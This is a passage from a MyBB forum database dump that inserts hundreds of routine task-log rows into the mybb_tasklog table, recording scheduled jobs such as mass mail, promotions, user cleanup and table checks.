'1350602083', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11221', '5', '1350602737', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11222', '9', '1350602757', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11223', '3', '1350603004', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11224', '9', '1350603638', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11225', '5', '1350603912', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11226', '9', '1350604526', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11227', '3', '1350604759', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11228', '1', '1350604944', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11229', '2', '1350605004', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11230', '7', '1350605018', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11231', '11', '1350605023', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11232', '5', '1350605144', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11233', '9', '1350605429', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11234', '5', '1350606379', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11235', '9', '1350606438', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11236', '3', '1350606767', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11237', '9', '1350607270', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11238', '5', '1350607752', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11239', '9', '1350608154', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11240', '3', '1350608358', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11241', '1', '1350608413', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11242', '7', '1350608423', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11243', '5', '1350608702', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11244', '9', '1350609026', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11245', '5', '1350609949', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11246', '9', '1350610042', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11247', '3', '1350610210', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11248', '9', '1350610831', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11249', '5', '1350611128', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11250', '9', '1350611730', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11251', '3', '1350611966', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11252', '1', '1350612073', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11253', '7', '1350612077', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11254', '5', '1350612368', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11255', '9', '1350612655', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11256', '5', '1350613508', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11257', '9', '1350613559', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11258', '3', '1350613819', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11259', '9', '1350614504', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11260', '5', '1350614708', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11261', '9', '1350615544', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11262', '3', '1350615587', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11263', '1', '1350615634', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11264', '7', '1350615641', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11265', '5', '1350615948', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11266', '9', '1350616208', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11267', '5', '1350617103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11268', '9', '1350617116', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11269', '3', '1350617432', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11270', '9', '1350618227', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11271', '5', '1350618330', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11272', '9', '1350618939', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11273', '3', '1350619343', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11274', '1', '1350619347', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11275', '7', '1350619383', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11276', '5', '1350619505', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11277', '9', '1350619826', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11278', '5', '1350620738', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11279', '9', '1350620785', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11280', '3', '1350621008', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11281', '9', '1350621676', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11282', '5', '1350621920', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11283', '9', '1350623693', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11284', '3', '1350623934', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11285', '1', '1350624027', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11286', '7', '1350624196', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11287', '5', '1350624212', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11288', '5', '1350624345', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11289', '9', '1350624357', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11290', '3', '1350624620', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11291', '9', '1350626025', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11292', '5', '1350626058', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11293', '9', '1350628478', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11294', '3', '1350628577', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11295', '1', '1350628580', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11296', '7', '1350628584', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11297', '5', '1350628927', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11298', '9', '1350629252', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11299', '5', '1350629282', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11300', '9', '1350629784', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11301', '3', '1350629988', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11302', '1', '1350630079', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11303', '7', '1350630154', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11304', '5', '1350630315', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11305', '9', '1350630643', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11306', '5', '1350631545', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11307', '9', '1350631558', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11308', '3', '1350631899', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11309', '9', '1350633075', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11310', '5', '1350633322', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11311', '9', '1350633397', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11312', '3', '1350633654', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11313', '1', '1350633678', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11314', '7', '1350633719', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11315', '5', '1350634035', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11316', '9', '1350634329', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11317', '5', '1350635300', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11318', '9', '1350635314', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11319', '3', '1350636417', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11320', '9', '1350636440', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11321', '5', '1350636441', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11322', '9', '1350636929', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11323', '3', '1350637609', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11324', '1', '1350637790', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11325', '7', '1350637793', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11326', '5', '1350637794', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11327', '9', '1350637814', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11328', '5', '1350638997', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11329', '9', '1350639006', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11330', '3', '1350639008', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11331', '9', '1350640389', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11332', '5', '1350640394', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11333', '9', '1350641246', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11334', '3', '1350641253', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11335', '1', '1350641262', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11336', '7', '1350641283', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11337', '5', '1350641304', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11338', '9', '1350641450', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11339', '5', '1350643832', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11340', '9', '1350643843', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11341', '3', '1350643847', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11342', '9', '1350645400', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11343', '3', '1350645403', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11344', '1', '1350645469', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11345', '7', '1350645865', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11346', '5', '1350645971', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11347', '9', '1350646005', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11348', '3', '1350646927', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11349', '9', '1350646984', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11350', '5', '1350647294', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11351', '9', '1350647735', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11352', '3', '1350647948', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11353', '1', '1350648007', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11354', '4', '1350648009', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11355', '7', '1350648052', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11356', '5', '1350648301', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11357', '9', '1350648911', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11358', '5', '1350649991', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11359', '9', '1350650003', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11360', '3', '1350650077', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11361', '9', '1350650413', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11362', '5', '1350650726', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11363', '9', '1350651553', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11364', '3', '1350651565', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11365', '1', '1350651633', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11366', '7', '1350651923', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11367', '5', '1350651927', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11368', '9', '1350652834', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11369', '5', '1350653141', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11370', '9', '1350653292', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11371', '3', '1350653561', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11372', '9', '1350654096', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11373', '5', '1350654380', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11374', '9', '1350654947', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11375', '3', '1350655175', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11376', '1', '1350655398', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11377', '7', '1350655417', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11378', '5', '1350655733', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11379', '9', '1350657733', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11380', '5', '1350657738', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11381', '3', '1350657758', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11382', '5', '1350658054', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11383', '9', '1350658784', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11384', '3', '1350658803', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11385', '1', '1350658855', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11386', '7', '1350658908', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11387', '5', '1350659203', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11388', '9', '1350659577', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11389', '5', '1350664041', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11390', '9', '1350664072', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11391', '3', '1350664082', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11392', '1', '1350664089', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11393', '7', '1350664096', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11394', '3', '1350664455', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11395', '9', '1350665188', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11396', '5', '1350666281', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11397', '9', '1350667784', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11398', '3', '1350667788', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11399', '1', '1350668125', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11400', '7', '1350668217', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11401', '5', '1350668222', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11402', '3', '1350668848', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11403', '9', '1350668962', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11404', '5', '1350668965', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11405', '9', '1350669658', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11406', '3', '1350669804', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11407', '1', '1350669938', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11408', '7', '1350669963', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11409', '5', '1350670406', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11410', '9', '1350670786', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11411', '5', '1350671131', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11412', '9', '1350671167', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11413', '3', '1350671572', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11414', '9', '1350672410', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11415', '5', '1350672444', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11416', '9', '1350672952', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11417', '3', '1350673187', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11418', '1', '1350673212', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11419', '7', '1350673234', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11420', '5', '1350673503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11421', '9', '1350673916', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11422', '5', '1350674764', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11423', '9', '1350674774', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11424', '3', '1350675006', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11425', '9', '1350675669', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11426', '5', '1350675905', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11427', '9', '1350676526', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11428', '3', '1350676835', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11429', '1', '1350676919', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11430', '7', '1350676926', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11431', '5', '1350677221', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11432', '9', '1350677419', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11433', '5', '1350678326', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11434', '9', '1350678382', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11435', '3', '1350678601', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11436', '9', '1350679420', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11437', '5', '1350679566', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11438', '9', '1350680234', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11439', '3', '1350680370', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11440', '1', '1350680431', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11441', '7', '1350680440', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11442', '5', '1350680776', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11443', '9', '1350681002', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11444', '5', '1350681937', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11445', '9', '1350681948', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11446', '3', '1350682205', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11447', '9', '1350682823', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11448', '5', '1350683102', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11449', '9', '1350683818', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11450', '3', '1350683943', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11451', '1', '1350684041', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11452', '7', '1350684125', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11453', '5', '1350684458', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11454', '9', '1350684623', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11455', '5', '1350685607', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11456', '9', '1350685739', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11457', '3', '1350685882', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11458', '9', '1350686615', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11459', '5', '1350686870', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11460', '9', '1350687312', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11461', '3', '1350687901', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11462', '1', '1350687904', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11463', '7', '1350687908', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11464', '5', '1350687923', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11465', '9', '1350688402', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11466', '5', '1350689265', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11467', '9', '1350689303', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11468', '3', '1350689680', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11469', '9', '1350690067', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11470', '5', '1350690443', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11471', '9', '1350691668', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11472', '3', '1350691727', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11473', '1', '1350691733', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11474', '2', '1350691739', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11475', '7', '1350691743', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11476', '11', '1350691765', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11477', '5', '1350691769', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11478', '9', '1350691830', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11479', '5', '1350692701', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11480', '9', '1350692769', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11481', '3', '1350693009', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11482', '9', '1350693616', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11483', '5', '1350693958', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11484', '9', '1350694682', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11485', '3', '1350694746', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11486', '1', '1350694802', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11487', '7', '1350694961', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11488', '5', '1350695179', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11489', '9', '1350695578', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11490', '5', '1350696621', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11491', '9', '1350696659', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11492', '3', '1350696664', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11493', '9', '1350697344', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11494', '5', '1350697503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11495', '9', '1350698139', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11496', '3', '1350698401', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11497', '1', '1350698413', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11498', '7', '1350698428', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11499', '5', '1350698822', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11500', '9', '1350699049', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11501', '5', '1350699904', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11502', '9', '1350699916', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11503', '3', '1350700313', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11504', '9', '1350700881', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11505', '5', '1350701182', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11506', '9', '1350701766', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11507', '3', '1350702117', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11508', '1', '1350702452', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11509', '7', '1350702457', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11510', '5', '1350702495', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11511', '9', '1350702633', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11512', '5', '1350703538', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11513', '9', '1350703560', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11514', '3', '1350703816', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11515', '9', '1350704530', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11516', '5', '1350704733', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11517', '9', '1350705320', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11518', '3', '1350705542', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11519', '1', '1350705602', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11520', '7', '1350705604', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11521', '5', '1350705902', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11522', '9', '1350706213', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11523', '5', '1350707103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11524', '9', '1350707131', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11525', '3', '1350707415', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11526', '9', '1350708015', 'The 